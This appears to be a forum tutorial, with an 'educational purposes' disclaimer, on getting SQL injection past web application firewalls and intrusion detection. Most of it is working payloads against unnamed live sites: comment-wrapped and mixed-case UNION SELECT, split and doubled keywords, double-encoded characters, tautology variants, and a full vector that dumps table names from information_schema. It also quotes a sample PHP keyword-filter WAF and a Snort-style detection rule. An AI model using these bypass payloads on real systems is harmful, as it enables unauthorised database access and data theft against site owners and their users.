This tutorial is purely for educational purposes!
Any misuse of my tutorials is at own risk!
This time we need the same things as my first tutorial,
instead of one vulnerable to union injection! We get an error saying illegal mix of characters.
Or another error warning perhaps. Something that proves theme of concept there is a WAF inside the web-app.
1. A vulnerable website. (With a illegal mix of char error when you tried union select).
2. Notepad. (this way you can write down what you tried already).
SQLI Filter Evasion.
1: Basic WAF and explanation.
* Short explanation.
* special characters and commenting out.
2. Advanced WAF Bypassing.
* Splitting keywords.
* Replacing keywords
* capitalization.
* Adding it all together.
* using characters.
* split the SQL statement.
* Encoding characters.
3: Intrusion detection.
* short explanation.
* How to bypass Intrusion detection.
Basic WAF and explanation.
Basic WAF Bypassing – short explanation.
WAF or in long terms Web Application Firewall.
Is a small program written to filter and log SQL Injection.
To bad for the administrators in most cases this is a fail attempt to secure there network.
It is not so easy to do WAF bypassing,
once you get the hang out of it its actually starting to be fun.
You have to combine and try all sorts of things even find new things.
I can never explain in one tutorial how to bypass everything.
I don’t even know how to bypass everything. Every WAF differs from another its up to how its written. Of course if you get your hands on the admins WAF file its easy.
Here is an example WAF file.
One that i got from a small php game back in the days i was young.
That was my first SQL Injection hit!
Code: [Select]
/*
$_GET = array_map('trim', $_GET);
//$_POST = array_map('trim', $_POST);
$_COOKIE = array_map('trim', $_COOKIE);
$_REQUEST = array_map('trim', $_REQUEST);
if(get_magic_quotes_gpc()):
$_GET = array_map('stripslashes', $_GET);
//$_POST = array_map('stripslashes', $_POST);
$_COOKIE = array_map('stripslashes', $_COOKIE);
$_REQUEST = array_map('stripslashes', $_REQUEST);
endif;
$_GET = array_map('mysql_real_escape_string', $_GET);
$_POST = array_map('mysql_real_escape_string', $_POST);
$_COOKIE = array_map('mysql_real_escape_string', $_COOKIE);
$_REQUEST = array_map('mysql_real_escape_string', $_REQUEST);
*/
// END OF ANTI MYSQL INJECTION
/* Logging */
$locatie = $_SERVER['REQUEST_URI'];
$array = Array();
$array[] = "mysql";
$array[] = "query";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "<script>";
$array[] = "</script>";
$array = Array();
$array[] = "mysql";
$array[] = ")";
$array[] = ";";
$array[] = "}";
$array[] = "INSERT";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "UPDATE";
$array[] = "COOKIE";
$array[] = "FILES";
$array[] = "POST";
$array[] = "REQUEST";
$array[] = "SERVER";
$array[] = "INSERT";
$array[] = "%40";
$array[] = "%20";
$array[] = "";
$array[] = "DROPTABLE";
$array[] = "TRUNCATE";
$array[] = "WHERE";
$array[] = "VALUES";
$array[] = "SELECT";
$array[] = "FROM";
$array[] = "exit";
$array[] = "'";
$array[] = '"';
$array[] = ",";
$array[] = "`";
$array[] = "echo";
foreach($array As $posinject) {
if(eregi($posinject,$locatie)) {
$time = 'NOW()';
mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)
VALUES ('".ID."', '".$_SERVER[REMOTE_ADDR]."', '".$locatie."', '".$tijd."')") or die(mysql_error());
header("location: news.php");
exit();
}
}Now we know what a Web application Fire-wall is let’s move on to bypassing it.
Attention you can see it has an IP logger: /* Logging */
Code: [Select]
mysql_query("INSERT INTO `injection`(`user_id`, `ip`, `location`, `date`)At this point you will start and see a lot of special characters for commenting out, evading and bypassing filters with them. This is by these are the most common to use for bypassing.
Code: [Select]
/*! */, (), #, --, +--+,--+-, -- -,,%20,/,//, <,> {,},...It is the most common way to bypass a WAF.
This way the WAF thinks it is a comment and there for not dangerous to the web-app.
Of course if the waf has more advanced filtering this could get tricky.
How to use commenting out in SQL Injection:
Code: [Select]
www.[site].com/index.php?id=-1+/*!union*/+select+1,2,3,4--+-Let’s bypass the select union and the select filter.
Code: [Select]
www.[site].com/index.php?id=-1+/*!union*/+/*!select*/+1,2,3,4--+-If it doesn’t we need to try other methods.
lets try some other characters. In this case we use hex.
union+select+1,2,3,4–+-
Well if that worked go on exploiting and adding your WAF filters everywhere you think it filters.
If it did not lets move on. By the way later in the tutorial your going to see how to do a whole vector while WAF bypassing.
Advanced WAF Bypassing – Splitting keywords.
We used the method commenting out before. If that did not work out there are several other methods.
Ill explain on splitting keywords now.
Adding special characters that get removed by the was can make our vector execute. Let’s say the was replaces > with a space.
Then the below example:
Code: [Select]
www.[site].com/index.php?id=-1+uni>on+sel>ect+1,2,3,4--+-
Code: [Select]
www.[site].com/index.php?id=-1+uni on+sel ect+1,2,3,4--+-There will be some cases where this will work do not forget this one.
Advanced WAF bypassing – Replacing keywords
There is another way to execute our vector called replacing the keywords.
Now how do we do this, we by now have to know the waf filters union and select.
Lets Make it filter out union and select!
This is what we are going to do:
UNIunionON+SELselectECT
The WAF will filter out union and select (orange words).
When he filters those key words the UNI and ON – SEL and ECT form one word again.
Some filters can’t replace it 2 times.
Example in URL:
Code: [Select]
www.[site].com/index.php?id=-1+UNIunionON+SeLselectECT+1,2,3,4--+-Nah as i said ones you get the hang out of this you will like it actually.
See it as a puzzle sudoku or something. Only harder
.Advanced WAF Bypassing – Capitalization.
Another way is to simply capitalize our characters.
Instead of union UnIoN In some basic WAF’s this will work.
An example in URL:
Code: [Select]
www.[site].com/index.php?id=-1+UnIoN+SeLeCt+1,2,3,4--+-We can combine this whet comments and other waf bypass methods.
Let’s show this in url:
Code: [Select]
www.[site].com/index.php?id=-1+/*!UnIoN*/+/*!SeLeCt*/+1,2,3,4--+-It’s a hell of a puzzle a brain cracker and that’s what so fun about it.
An entire vector to get the table names would be as following:
Code: [Select]
www.[site].com/index.php?id=-1+/*!UnIoN*/+SeLeCT+1,2,group_concat(/*!table_name*/),4+FrOM+/*information_schema*/,TaBlEs+/*!WHERE*/+/*!TaBlE_ScHeMa*/+like+database()- -
I also changed 2 other things here.
changing the . to a , Is also a bypassing method as some WAFs filter that.
Look at the end of the line where it should say “=” i have now placed +like+ this is because the database accepts like as = and i used it because = can be WAF filtered.
WAF Bypassing – using characters.
There is a whole bunch of characters available we can use to bypass WAF filters.
following characters can do this:
Code: [Select]
|, ?, ", ', *, %, £ , [], ;, :, \/, $, €, ()...In these cases we can simply use the * character to split the keywords.
We would do the next logical thing:
Code: [Select]
www.[site].com/index.php?id=-1+uni*on+sel*ect+1,2,3,4--+-But in this case only * is filtered out by the was replacing it whit a space having the same result as in splitting keywords.
WAF Bypassing – Split sql statement.
In some cases parts of the sql statement are filtered out.
For example union or select.
which means by only using one keyword: id=-1+union+1,2,3–+- or use only select.
we can in some cases bypass the filter.
WAF Bypassing – encoding characters.
By encoding characters for example the ‘,/*!*/,(,),. and more…
You can bypass some web application firewalls because it is not able to translate the character encoding.
Its rare but it happens. So its not so important but you never know.
Double encoding characters:
single quote ‘ %u0027
open ( = %u0028
close ) = %u0029
and a white space %u0020
Google if you want to find more. You can also do url encoding in hex (single encoding).
Hex(single encoding) is almost always filtered by the WAF.
Thats why i stated double. You can also try HTML char or MySQL char in the hackbar.
We had most of the WAF bypassing.
I know it’s still pretty basic but it is hard to explain WAF bypassing without being able to show live examples.
You’ll have to learn waf at own hand that the whole thing about WAF Bypassing.
There is another kind of filter. We call it intrusion detection.
Intrusion detection evasion!
Intrusion detection evasion a mouth full ain’t it!
Intrusion detection filters or 1=1– and 1=1 and so on…
This is for SQL injection in inputs. That will be one of my tutorials but i have a whole bunch of them to cover first.
So you will have to be patient i cover this already because its also filter evasion.
We need to Bypass Intrusion detection in order to know the website is vulnerable to SQL Injection.
Example of a basic intrusion detection program.
Code: [Select]
$HTTP_SERVERS $HTTP_PORTS (msg: “SQL Injection attempt”;
flow: to_server, established; content: “' or 1=1 --”; nocase; sid: 1; rev:1;This php code said:
alert when he gets this or 1=1 — in his http server/ http ports so he displays the message, msg: “sql injection attempt”:
That is basic the filter could be more advanced then this.
Anyway lets explain how to evade it.
The program said i cant do 1=1 — I say the program is stupid and do 3=3 — which is also true.
The or and the = sign can be filtered as well. Resulting in our next logical step:
and 3 like 3 —
That should work for sure according to the intrusion detection system i showed.
In all those fail attempts of the admin he still won’t give in.
If like won’t work then do 1 < 2 this means 1 is smaller then 2 and there for database returns true.
Of course if fail admin did filter that as well.
We could try 5 > 4 — which means 5 is bigger then 4. Database should return true.
Easy huh a little maths game whit a fail admin.
lets try and 1599 – 1 like 1598 —
This said 1599 -1 is 1598 hah owned database.
You can also check for Unicode that’s a second option in evading intrusion detection.
unicode cheat sheet
Good luck, If you have questions? Hit me up!
Don’t mind my terrible English.
